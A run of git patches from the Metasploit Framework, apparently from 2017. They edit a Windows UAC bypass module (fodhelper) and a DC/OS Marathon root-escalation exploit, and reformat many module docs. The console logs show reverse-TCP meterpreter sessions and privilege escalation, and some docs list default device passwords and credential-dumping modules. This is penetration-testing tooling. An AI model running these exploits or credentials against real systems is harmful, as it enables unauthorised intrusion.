diff --git a/modules/exploits/windows/local/bypassuac_fodhelper.rb b/modules/exploits/windows/local/bypassuac_fodhelper.rb
index 71aeef84d2..b5f46e2ade 100644
--- a/modules/exploits/windows/local/bypassuac_fodhelper.rb
+++ b/modules/exploits/windows/local/bypassuac_fodhelper.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Local
def initialize(info={})
super(update_info(info,
- 'Name' => 'Windows Escalate UAC Protection Bypass (Via FodHelper Registry Key)',
+ 'Name' => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)',
'Description' => %q{
This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
the current user hive, and inserting a custom command that will get invoked when
From 6f1f630b0eaf406fff2822bb90ac3d9d88224e9d Mon Sep 17 00:00:00 2001
From: amaloteaux
Date: Mon, 22 May 2017 19:17:26 +0100
Subject: [PATCH 09/38] add documentation
---
.../windows/local/bypassuac_fodhelper.md | 89 +++++++++++++++++++
1 file changed, 89 insertions(+)
create mode 100644 documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
diff --git a/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md b/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
new file mode 100644
index 0000000000..d84a7cc89a
--- /dev/null
+++ b/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
@@ -0,0 +1,89 @@ +## Intro + + This module will bypass Windows 10 UAC by hijacking a special key in the Registry under + the current user hive, and inserting a custom command that will get invoked when + the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC + flag turned off. + + This module modifies a registry key, but cleans up the key once the payload has + been invoked. + + The module does not require the architecture of the payload to match the OS. If + specifying EXE::Custom your DLL should call ExitProcess() after starting your + payload in a separate process. + +## Usage + + You'll first need to obtain a session on the target system. + Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options. + + +##Scenario + + +``` +msf > +[*] Sending stage (1189423 bytes) to 192.168.50.4 +[*] Meterpreter session 11 opened (192.168.50.1:4444 -> 192.168.50.4:1654) at 2017-05-22 19:10:43 +0100 + +msf > sessions -i 11 +[*] Starting interaction with 11... + +meterpreter > shell +Process 9496 created. +Channel 1 created. +Microsoft Windows [Version 10.0.14393] +(c) 2016 Microsoft Corporation. All rights reserved. + +C:\Users\sasha\Desktop>whoami /all | findstr /C:"Mandatory Label" +whoami /all | findstr /C:"Mandatory Label" +Mandatory Label\Medium Mandatory Level Label S-1-16-8192 + +C:\Users\sasha\Desktop>exit +exit +meterpreter > +Background session 11? 
[y/N] +msf > use exploit/windows/local/bypassuac_fodhelper +msf exploit(bypassuac_fodhelper) > set SESSION 11 +SESSION => 11 +msf exploit(bypassuac_fodhelper) > show targets + +Exploit targets: + + Id Name + -- ---- + 0 Windows x86 + 1 Windows x64 + + +msf exploit(bypassuac_fodhelper) > set target 0 +target => 0 +msf exploit(bypassuac_fodhelper) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(bypassuac_fodhelper) > run + +[*] Started reverse TCP handler on 192.168.50.1:4445 +[*] UAC is Enabled, checking level... +[+] Part of Administrators group! Continuing... +[+] UAC is set to Default +[+] BypassUAC can bypass this setting, continuing... +[*] Configuring payload and stager registry keys ... +[*] Executing payload: C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\System32\fodhelper.exe +[*] Sending stage (957487 bytes) to 192.168.50.4 +[*] Meterpreter session 12 opened (192.168.50.1:4445 -> 192.168.50.4:1655) at 2017-05-22 19:12:03 +0100 +[*] Cleaining up registry keys ... + +meterpreter > shell +Process 4076 created. +Channel 1 created. +Microsoft Windows [Version 10.0.14393] +(c) 2016 Microsoft Corporation. All rights reserved. + +C:\WINDOWS\system32>whoami /all | findstr /C:"Mandatory Label" +whoami /all | findstr /C:"Mandatory Label" +ERROR: Unable to get user claims information. +Mandatory Label\High Mandatory Level Label S-1-16-12288 + +C:\WINDOWS\system32> + +``` From 93bb47d54693edfbb5f2df031f169e4b1a87741a Mon Sep 17 00:00:00 2001 From: amaloteaux Date: Mon, 22 May 2017 19:27:15 +0100 Subject: [PATCH 10/38] msftidy fix --- .../windows/local/bypassuac_fodhelper.md | 1 - .../windows/local/bypassuac_fodhelper.rb | 24 +++++++++---------- 2 files changed, 12 insertions(+), 13 deletions(-) diff --git a/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md b/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md index d84a7cc89a..2017cbc7eb 100644 
--- a/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
+++ b/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
@@ -20,7 +20,6 @@
 ##Scenario
-
 ```
 msf >
 [*] Sending stage (1189423 bytes) to 192.168.50.4
diff --git a/modules/exploits/windows/local/bypassuac_fodhelper.rb b/modules/exploits/windows/local/bypassuac_fodhelper.rb
index b5f46e2ade..8eac5c5949 100644
--- a/modules/exploits/windows/local/bypassuac_fodhelper.rb
+++ b/modules/exploits/windows/local/bypassuac_fodhelper.rb
@@ -78,11 +78,11 @@ class MetasploitModule < Msf::Exploit::Local
 if session.arch == ARCH_X86
 # fodhelper.exe is x64 only exe
 commspec = '%WINDIR%\\Sysnative\\cmd.exe'
- if target_arch.first == ARCH_X64
- # We can't use absolute path here as
- # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
- psh_path = "powershell.exe"
- end
+ if target_arch.first == ARCH_X64
+ # We can't use absolute path here as
+ # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
+ psh_path = "powershell.exe"
+ end
 end
 if target_arch.first == ARCH_X86
 # Invoking x86, so switch to SysWOW64
@@ -95,10 +95,10 @@ class MetasploitModule < Msf::Exploit::Local
 end
 end
- if !payload.arch.empty? && !(payload.arch.first == target_arch.first)
- fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
- end
-
+ if !payload.arch.empty? && !(payload.arch.first == target_arch.first)
+ fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
+ end
+
 # Validate that we can actually do things before we bother
 # doing any more work
 check_permissions!
@@ -124,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Local
 template_path = Rex::Powershell::Templates::TEMPLATE_DIR
 psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)
-
+
 if psh_payload.length > CMD_MAX_LEN
 fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
 end
@@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Local
 end
 registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
- registry_setvaldata(FODHELPER_WRITE_KEY, payload_value,psh_payload, EXEC_REG_VAL_TYPE, registry_view)
+ registry_setvaldata(FODHELPER_WRITE_KEY, payload_value,psh_payload, EXEC_REG_VAL_TYPE, registry_view)
 # Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch.
 cmd_path = expand_path(commspec)
@@ -168,7 +168,7 @@ class MetasploitModule < Msf::Exploit::Local
 if existing.empty?
 registry_deletekey(FODHELPER_DEL_KEY, registry_view)
 else
- registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
+ registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
 end
 registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view)
From 2fbbc98b5d2a47e57a5da33592b9ca8f932e87ae Mon Sep 17 00:00:00 2001
From: amaloteaux
Date: Mon, 22 May 2017 19:50:40 +0100
Subject: [PATCH 11/38] document little trick for those who read :)
---
 .../modules/exploit/windows/local/bypassuac_fodhelper.md | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md b/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
index 2017cbc7eb..95e24cbfba 100644
--- a/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
+++ b/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
@@ -15,7 +15,10 @@
 ## Usage
 You'll first need to obtain a session on the target system.
- Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options.
+ Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options.
+ The module use an hardcoded timeout of 5 seconds during which it expects fodhelper.exe to be launched on the target system.
+ On slower system this may be too short, resulting in no session being created. In this case disable the automatic payload handler (`set DISABLEPAYLOADHANDLER true`)
+ and manually create a job handler corresponding to the payload.
 ##Scenario
From bac23757a4c8a863c201229d1e1806b49926810a Mon Sep 17 00:00:00 2001
From: wolfthefallen
Date: Tue, 30 May 2017 09:33:03 -0400
Subject: [PATCH 12/38] Updated based on busterb comments
---
 .../exploit/linux/http/dcos_marathon.md | 40 +++++++++----------
 modules/exploits/linux/http/dcos_marathon.rb | 10 +----
 2 files changed, 22 insertions(+), 28 deletions(-)
diff --git a/documentation/modules/exploit/linux/http/dcos_marathon.md b/documentation/modules/exploit/linux/http/dcos_marathon.md
index fcf52aa50f..b215fe0556 100644
--- a/documentation/modules/exploit/linux/http/dcos_marathon.md
+++ b/documentation/modules/exploit/linux/http/dcos_marathon.md
@@ -2,36 +2,36 @@ Utilizing the DCOS Cluster's Marathon UI, an attacker can create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container. -As the docker container excutes command as uid 0 it is honored +As the docker container executes command as uid 0 it is honored by the host operating system allowing the attacker to edit/create files owed by root. This exploit abuses this to creates a cron job in the '/etc/cron.d/' path of the host server. -*Notes: The docker image must be a valid docker image from +*Notes: The docker image must be a valid docker image from hub.docker.com. Further more the docker container will only deploy if there are resources available in the DC/OS ## DCOS -This Expoit was tested with CentOS 7 as the host operating system for +This Exploit was tested with CentOS 7 as the host operating system for the 2 services of the DCOS cluster. With DCOS version 1.7 and 1.8, with -Defualt 'custom' installation for on site premise setup. Only the Install +Default 'custom' installation for on site premise setup. Only the Install part of the DCOS guide was completed, the system hardening and securing -your cluster section where skipped. This is to represent a 'Defualt' install +your cluster section where skipped. This is to represent a 'Default' install with a system admin conducting hasty deployments taking no thought about security. ## To Setup Your Cluster -I recommend doing a 'On-Premies'/custom +I recommend doing a 'on-premise'/custom cluster. https://dcos.io/docs/1.8/administration/installing/custom/ Create a virtual CentOS machine, install requirements base on the above guide. 
- + ```bash # The TLDR from the above guide sudo systemctl stop firewalld && sudo systemctl disable firewalld sudo yum install -y tar xz unzip curl ipset ntp -systemctl start ntpd -systemctl enable ntpd +sudo systemctl start ntpd +sudo systemctl enable ntpd sudo sed -i s/SELINUX=enforcing/SELINUX=permissive/g /etc/selinux/config && \ sudo groupadd nogroup && sudo reboot ``` @@ -60,7 +60,7 @@ Once the CentOS machine has rebooted, edit the systemctl service file for docker and change the ExecStart- line to `ExecStart=/usr/bin/docker daemon --storage-driver=overlay -H fd://` restart the docker service and verify it is running. -lastely generate ssh rsa keys for authentication. And update the +lastly generate ssh rsa keys for authentication. And update the /etc/ssh/sshd_config file to support root login. ```bash @@ -77,10 +77,10 @@ Start the DCOS-Master and DCOS-Agent virtual machines You just cloned. Login and get their current IP address. * Note: I recommend giving them static IPs if you have further use for the cluster. -From here use another linux machine with docker installed to finish -the installation process. I used an ubuntu machine with docker installed. +From here use another Linux machine with docker installed to finish +the installation process. I used an Ubuntu machine with docker installed. -Follow the custom CLI guide for creating the required files in +Follow the custom CLI guide for creating the required files in the genconf folder. https://dcos.io/docs/1.8/administration/installing/custom/cli/ 
@@ -137,9 +137,9 @@ If all is passing navigate to http://[master_ip]:8080/ You should see the Marathon UI web application. # Exploitation -This module is designed for the attacker to leaverage the creatation of a -docker contianer with out authentication through the DCOS Marathon UI -to gain root access to the hosting server of the docker container +This module is designed for the attacker to leverage, creation of a +docker container with out authentication through the DCOS Marathon UI +to gain root access to the hosting server of the docker container in the DCOS cluster. ## Options @@ -157,7 +157,7 @@ in the DCOS cluster. ## Example Output ``` -msf > use exploit/linux/http/dcos_marathon +msf > use exploit/linux/http/dcos_marathon msf exploit(dcos_marathon) > set RHOST 192.168.0.9 RHOST => 192.168.0.9 msf exploit(dcos_marathon) > set payload python/meterpreter/reverse_tcp @@ -168,9 +168,9 @@ msf exploit(dcos_marathon) > set verbose true verbose => true msf exploit(dcos_marathon) > check [*] 192.168.0.9:8080 The target appears to be vulnerable. -msf exploit(dcos_marathon) > exploit +msf exploit(dcos_marathon) > exploit -[*] Started reverse TCP handler on 192.168.0.100:4444 +[*] Started reverse TCP handler on 192.168.0.100:4444 [*] Setting container json request variables [*] Creating the docker container command [*] The docker container is created, waiting for it to deploy @@ -188,5 +188,5 @@ OS : Linux 3.10.0-327.36.3.el7.x86_64 #1 SMP Mon Oct 24 16:09:20 UT Architecture : x64 System Language : en_US Meterpreter : python/linux -meterpreter > +meterpreter > ``` diff --git a/modules/exploits/linux/http/dcos_marathon.rb b/modules/exploits/linux/http/dcos_marathon.rb index dd7168532a..78e0915c85 100644 --- a/modules/exploits/linux/http/dcos_marathon.rb +++ b/modules/exploits/linux/http/dcos_marathon.rb 
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
@@ -18,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
 Utilizing the DCOS Cluster's Marathon UI, an attacker can create
 a docker container with the '/' path mounted with read/write
 permissions on the host server that is running the docker container.
- As the docker container excutes command as uid 0 it is honored
+ As the docker container executes command as uid 0 it is honored
 by the host operating system allowing the attacker to edit/create
 files owed by root. This exploit abuses this to creates a cron job
 in the '/etc/cron.d/' path of the host server.
@@ -32,10 +30,6 @@ class MetasploitModule < Msf::Exploit::Remote
 'References' => [
 [ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
 ],
- 'Payload' =>
- {
- 'DisableNops'=> true,
- },
 'Targets' => [
 [ 'Python', {
 'Platform' => 'python',
@@ -58,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
 OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]),
 OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
 OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
- OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wiat for the docker container to deploy', 60 ])
+ OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
 ], self.class)
 end
From 9c93aae412427475a2d7efbb095f22faefedcae0 Mon Sep 17 00:00:00 2001
From: wolfthefallen
Date: Tue, 30 May 2017 10:07:07 -0400
Subject: [PATCH 13/38] Removed self.class from register
---
 modules/exploits/linux/http/dcos_marathon.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/linux/http/dcos_marathon.rb b/modules/exploits/linux/http/dcos_marathon.rb
index 78e0915c85..0d458db61a 100644
--- a/modules/exploits/linux/http/dcos_marathon.rb
+++ b/modules/exploits/linux/http/dcos_marathon.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
 OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
 OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
 OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
- ], self.class)
+ ])
 end
 def get_apps
From 1c23be91a70757a6a09aa6f7fad7b8cce3af64e6 Mon Sep 17 00:00:00 2001
From: h00die Date: Wed, 31 May 2017 21:21:38 -0400 Subject: [PATCH 14/38] sample output to scenarios conversion in docs --- .../admin/chromecast/chromecast_youtube.md | 4 ++-- .../auxiliary/admin/http/scadabr_credential_dump.md | 2 +- .../admin/http/zabbix_ldap_password_extractor.md | 0 .../modules/auxiliary/gather/censys_search.md | 4 ++-- .../modules/auxiliary/scanner/ftp/anonymous.md | 4 ++-- .../modules/auxiliary/scanner/ftp/ftp_login.md | 3 ++- .../modules/auxiliary/scanner/ftp/ftp_version.md | 4 ++-- .../scanner/http/binom3_login_config_pass_dump.md | 13 +++++++++++-- .../auxiliary/scanner/http/chromecast_webserver.md | 4 ++-- .../auxiliary/scanner/http/chromecast_wifi.md | 4 ++-- .../modules/auxiliary/scanner/http/crawler.md | 3 ++- .../auxiliary/scanner/http/epmp1000_cmd_exec.md | 9 +++++++-- .../auxiliary/scanner/http/epmp1000_dump_config.md | 5 +++-- .../auxiliary/scanner/http/epmp1000_dump_hashes.md | 9 +++++++-- .../auxiliary/scanner/http/epmp1000_web_login.md | 5 +++-- .../auxiliary/scanner/http/gavazzi_em_login_loot.md | 12 +++++++----- .../http/meteocontrol_weblog_extractadmin.md | 5 +++-- .../scanner/http/ms15_034_http_sys_memory_dump.md | 3 ++- .../modules/auxiliary/scanner/http/owa_ews_login.md | 5 +++-- .../modules/auxiliary/scanner/http/robots_txt.md | 3 ++- .../scanner/ike/cisco_ike_benigncertain.md | 2 +- .../auxiliary/scanner/snmp/cambium_snmp_loot.md | 8 +++++--- .../multi/browser/adobe_flash_hacking_team_uaf.md | 2 +- .../modules/exploit/multi/http/axis2_deployer.md | 4 +--- .../exploit/multi/http/glassfish_deployer.md | 2 +- .../exploit/multi/http/mediawiki_syntaxhighlight.md | 5 +++-- .../multi/http/rails_web_console_v2_code_exec.md | 7 +++---- .../windows/http/manageengine_connectionid_write.md | 5 +++-- .../windows/http/serviio_checkstreamurl_cmd_exec.md | 2 +- .../exploit/windows/iis/iis_webdav_upload_asp.md | 2 +- 30 files changed, 85 insertions(+), 55 deletions(-) create mode 100644 
documentation/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.md diff --git a/documentation/modules/auxiliary/admin/chromecast/chromecast_youtube.md b/documentation/modules/auxiliary/admin/chromecast/chromecast_youtube.md index b52fa70223..0c31240ea7 100644 --- a/documentation/modules/auxiliary/admin/chromecast/chromecast_youtube.md +++ b/documentation/modules/auxiliary/admin/chromecast/chromecast_youtube.md @@ -14,9 +14,9 @@ Naturally, audio should be cranked to 11 before running this module. The YouTube video to be played. Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo) -## Sample Output +## Scenarios -Of note, this was played on a 1st generation Google Chromecast (USB stick looking, not circular) +### 1st generation Google Chromecast (USB stick looking, not circular) ``` msf > auxiliary/admin/chromecast/chromecast_youtube diff --git a/documentation/modules/auxiliary/admin/http/scadabr_credential_dump.md b/documentation/modules/auxiliary/admin/http/scadabr_credential_dump.md index db767d338b..0ad574b540 100644 --- a/documentation/modules/auxiliary/admin/http/scadabr_credential_dump.md +++ b/documentation/modules/auxiliary/admin/http/scadabr_credential_dump.md @@ -27,7 +27,7 @@ 7. You should get credentials -## Sample Output +## Scenarios ``` [+] 172.16.191.166:8080 Authenticated successfully as 'admin' diff --git a/documentation/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.md b/documentation/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.md new file mode 100644 index 0000000000..e69de29bb2 diff --git a/documentation/modules/auxiliary/gather/censys_search.md b/documentation/modules/auxiliary/gather/censys_search.md index fb243e2805..92ea6fe952 100644 --- a/documentation/modules/auxiliary/gather/censys_search.md +++ b/documentation/modules/auxiliary/gather/censys_search.md 
@@ -9,9 +9,9 @@ The module use the Censys REST API to access the same data accessible through we 5: Do: `set CENSYS_DORK rapid7` 6: Do: `run` -## Sample Output +## Scenarios -#### Certificates Search +### Certificates Search ``` msf auxiliary(censys_search) > set CENSYS_DORK rapid7 diff --git a/documentation/modules/auxiliary/scanner/ftp/anonymous.md b/documentation/modules/auxiliary/scanner/ftp/anonymous.md index dbb0f5b27d..f36a25ff6c 100644 --- a/documentation/modules/auxiliary/scanner/ftp/anonymous.md +++ b/documentation/modules/auxiliary/scanner/ftp/anonymous.md @@ -57,9 +57,9 @@ This module allows us to scan through a series of IP Addresses and provide detai 3. Do: ```set RPORT [IP]``` 4. Do: ```run``` -## Sample Output +## Scenarios -### On vsFTPd 3.0.3 on Kali +### vsFTPd 3.0.3 on Kali ``` msf > use auxiliary/scanner/ftp/anonymous diff --git a/documentation/modules/auxiliary/scanner/ftp/ftp_login.md b/documentation/modules/auxiliary/scanner/ftp/ftp_login.md index 9d6c7a671d..f9eadd3a64 100644 --- a/documentation/modules/auxiliary/scanner/ftp/ftp_login.md +++ b/documentation/modules/auxiliary/scanner/ftp/ftp_login.md @@ -47,7 +47,8 @@ This module will test FTP logins on a range of machines and report successful lo 3. Do: ```set RPORT [IP]``` 4. Do: ```run``` -## Sample Output +## Scenarios + ``` msf> use auxiliary/scanner/ftp/ftp_login msf auxiliary(ftp_login) > set RHOSTS ftp.openbsd.org diff --git a/documentation/modules/auxiliary/scanner/ftp/ftp_version.md b/documentation/modules/auxiliary/scanner/ftp/ftp_version.md index 86e9b01cae..60347345d4 100644 --- a/documentation/modules/auxiliary/scanner/ftp/ftp_version.md +++ b/documentation/modules/auxiliary/scanner/ftp/ftp_version.md @@ -47,9 +47,9 @@ This module allows us to scan through a series of IP Addresses and provide detai 3. Do: ```set RPORT [IP]``` 4. Do: ```run``` -## Sample Output +## Scenarios -### On vsFTPd 3.0.3 on Kali +### vsFTPd 3.0.3 on Kali ``` msf > use auxiliary/scanner/ftp/ftp_version 
diff --git a/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md b/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md index cdfc0f1acb..727e28d2f4 100644 --- a/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md +++ b/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md @@ -1,4 +1,13 @@ -This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found. +This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. +There are four (4) default accounts: + +1. root/root +2. admin/1 +3. alg/1 +4. user/1 + +In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. +The module attempts to download configuration and password files depending on the login user credentials found. ## Verification Steps @@ -7,7 +16,7 @@ This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Qual 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use auxiliary/scanner/http/binom3_login_config_pass_dump diff --git a/documentation/modules/auxiliary/scanner/http/chromecast_webserver.md b/documentation/modules/auxiliary/scanner/http/chromecast_webserver.md index 49801c5f45..dbc813c245 100644 --- a/documentation/modules/auxiliary/scanner/http/chromecast_webserver.md 
+++ b/documentation/modules/auxiliary/scanner/http/chromecast_webserver.md @@ -6,9 +6,9 @@ This module is a scanner which enumerates Google Chromecast via its HTTP interfa 2. Do: ```set RHOSTS [IP]``` 3. Do: ```run``` -## Sample Output +## Scenarios -Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular) +### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular) ``` msf > use auxiliary/scanner/http/chromecast_webserver diff --git a/documentation/modules/auxiliary/scanner/http/chromecast_wifi.md b/documentation/modules/auxiliary/scanner/http/chromecast_wifi.md index b9e2e88091..44584372fd 100644 --- a/documentation/modules/auxiliary/scanner/http/chromecast_wifi.md +++ b/documentation/modules/auxiliary/scanner/http/chromecast_wifi.md @@ -6,9 +6,9 @@ This module is a scanner which enumerates WiFi access points visible from a Goog 2. Do: ```set RHOSTS [IP]``` 3. Do: ```run``` -## Sample Output +## Scenarios -Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular) +### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular) ``` msf > use auxiliary/scanner/http/chromecast_wifi diff --git a/documentation/modules/auxiliary/scanner/http/crawler.md b/documentation/modules/auxiliary/scanner/http/crawler.md index 0dedb947c3..3ef998b739 100644 --- a/documentation/modules/auxiliary/scanner/http/crawler.md +++ b/documentation/modules/auxiliary/scanner/http/crawler.md @@ -34,9 +34,10 @@ You can use any web application to test the crawler. 4. Do: ```set URI [PATH]``` 4. Do: ```run``` -## Sample Output +## Scenarios ### Example against [WebGoat](https://github.com/WebGoat/WebGoat) + ``` msf> use auxiliary/scanner/http/crawler msf auxiliary(crawler) > set RHOST 127.0.0.1 
diff --git a/documentation/modules/auxiliary/scanner/http/epmp1000_cmd_exec.md b/documentation/modules/auxiliary/scanner/http/epmp1000_cmd_exec.md index 1bd59c1165..7349610721 100755 --- a/documentation/modules/auxiliary/scanner/http/epmp1000_cmd_exec.md +++ b/documentation/modules/auxiliary/scanner/http/epmp1000_cmd_exec.md @@ -1,4 +1,9 @@ -This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 ( use auxiliary/scanner/http/epmp1000_cmd_exec diff --git a/documentation/modules/auxiliary/scanner/http/epmp1000_dump_config.md b/documentation/modules/auxiliary/scanner/http/epmp1000_dump_config.md index a10082cce2..c7a42c8a69 100644 --- a/documentation/modules/auxiliary/scanner/http/epmp1000_dump_config.md +++ b/documentation/modules/auxiliary/scanner/http/epmp1000_dump_config.md @@ -1,4 +1,5 @@ -This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer, home/home, and readonly/readonly. This module requires any one of the following login credentials - admin / installer / home - to dump device configuration file. +This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer, home/home, and readonly/readonly. +This module requires any one of the following login credentials - admin / installer / home - to dump device configuration file. ## Verification Steps @@ -7,7 +8,7 @@ This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use auxiliary/scanner/http/epmp1000_dump_config diff --git a/documentation/modules/auxiliary/scanner/http/epmp1000_dump_hashes.md b/documentation/modules/auxiliary/scanner/http/epmp1000_dump_hashes.md index 6ff25406ec..cb1a7cdc5f 100644 --- a/documentation/modules/auxiliary/scanner/http/epmp1000_dump_hashes.md 
+++ b/documentation/modules/auxiliary/scanner/http/epmp1000_dump_hashes.md @@ -1,4 +1,9 @@ -This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 ( use auxiliary/scanner/http/epmp1000_dump_hashes diff --git a/documentation/modules/auxiliary/scanner/http/epmp1000_web_login.md b/documentation/modules/auxiliary/scanner/http/epmp1000_web_login.md index 8c90ba0351..34271d7913 100644 --- a/documentation/modules/auxiliary/scanner/http/epmp1000_web_login.md +++ b/documentation/modules/auxiliary/scanner/http/epmp1000_web_login.md @@ -1,4 +1,5 @@ -This module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials. Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly. +This module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials. +Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly. ## Verification Steps @@ -7,7 +8,7 @@ This module scans for Cambium ePMP 1000 management login portal(s), and attempts 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use auxiliary/scanner/http/epmp1000_web_login diff --git a/documentation/modules/auxiliary/scanner/http/gavazzi_em_login_loot.md b/documentation/modules/auxiliary/scanner/http/gavazzi_em_login_loot.md index 357b0fb84d..b6a63b1c8c 100644 --- a/documentation/modules/auxiliary/scanner/http/gavazzi_em_login_loot.md +++ b/documentation/modules/auxiliary/scanner/http/gavazzi_em_login_loot.md 
@@ -1,11 +1,13 @@ -This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication. +This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. +A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication. -The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics. +The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. +This db file contains information such as power/energy utilization data, tariffs, and revenue statistics. Vulnerable firmware versions include: -VMU-C EM prior to firmware Version A11_U05 -VMU-C PV prior to firmware Version A17. +* VMU-C EM prior to firmware Version A11_U05 +* VMU-C PV prior to firmware Version A17. ## Verification Steps @@ -14,7 +16,7 @@ VMU-C PV prior to firmware Version A17. 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use auxiliary/scanner/http/gavazzi_em_login_loot diff --git a/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md index a1eba6a6c9..904c63465a 100644 --- a/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md 
